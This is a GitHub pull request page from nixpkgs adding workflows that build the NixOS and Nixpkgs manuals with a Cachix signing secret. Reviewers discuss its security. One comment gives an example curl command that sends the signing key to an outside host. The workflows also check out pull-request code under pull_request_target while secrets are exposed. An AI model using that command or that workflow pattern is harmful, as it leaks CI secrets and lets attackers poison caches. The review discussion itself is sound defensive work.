Skip to content

.github/workflows: build NixOS/Nixpkgs manuals #106036

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Merged
zowoq merged 1 commit into from
Jan 2, 2021
Merged

.github/workflows: build NixOS/Nixpkgs manuals #106036

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
28 changes: 28 additions & 0 deletions .github/workflows/manual-nixos.yml
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,28 @@
name: "Build NixOS manual"

on:
pull_request_target:
branches:
- master
paths:
- 'nixos/**'

jobs:
nixos:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
with:
# pull_request_target checks out the base branch by default
ref: refs/pull/${{ github.event.pull_request.number }}/merge
- uses: cachix/install-nix-action@v12
with:
# explicitly enable sandbox
extra_nix_config: sandbox = true
- uses: cachix/cachix-action@v8
with:
# This cache is for the nixos/nixpkgs manual builds and should not be trusted or used elsewhere.
name: nixpkgs-ci
signingKey: '${{ secrets.CACHIX_SIGNING_KEY }}'
Copy link
Member

@Mic92 Mic92 Dec 6, 2020

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

@domenkozar Do you see any way an attacker could extract the signing key in this case?

Copy link
Member

@zimbatm zimbatm Dec 7, 2020

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Anybody with nixpkgs push access can extract the signing key easily.

Push a commit on a branch with curl https://myside.com/${{ secrets.CACHIX_SIGNING_KEY} somewhere in the actions, then enjoy your logs.

We should make sure that nobody consumes that cache except github actions.

Copy link
Member

@domenkozar domenkozar Dec 8, 2020

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I'd suggest to delete the cache and generate a new one managed with auth tokens. That will ensure tokens can be revoked without losing the cache.

On top of that, until we can give committers only merge access and not direct commit access, about 140 people can extract the key. I don't think anyone would do it on purpose, but hacking 1 of 140 github accounts is not infeasible.

I suggest we add explicit note that the cache should not be trusted outside the CI usage.

Copy link
Contributor Author

@zowoq zowoq Jan 1, 2021

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I suggest we add explicit note that the cache should not be trusted outside the CI usage.

Done.

- name: Building NixOS manual
run: nix-build --option restrict-eval true nixos/release.nix -A manual.x86_64-linux
28 changes: 28 additions & 0 deletions .github/workflows/manual-nixpkgs.yml
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,28 @@
name: "Build Nixpkgs manual"

on:
pull_request_target:
branches:
- master
paths:
- 'doc/**'

jobs:
nixpkgs:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
with:
# pull_request_target checks out the base branch by default
ref: refs/pull/${{ github.event.pull_request.number }}/merge
- uses: cachix/install-nix-action@v12
with:
# explicitly enable sandbox
extra_nix_config: sandbox = true
- uses: cachix/cachix-action@v8
with:
# This cache is for the nixos/nixpkgs manual builds and should not be trusted or used elsewhere.
name: nixpkgs-ci
signingKey: '${{ secrets.CACHIX_SIGNING_KEY }}'
- name: Building Nixpkgs manual
run: nix-build --option restrict-eval true pkgs/top-level/release.nix -A manual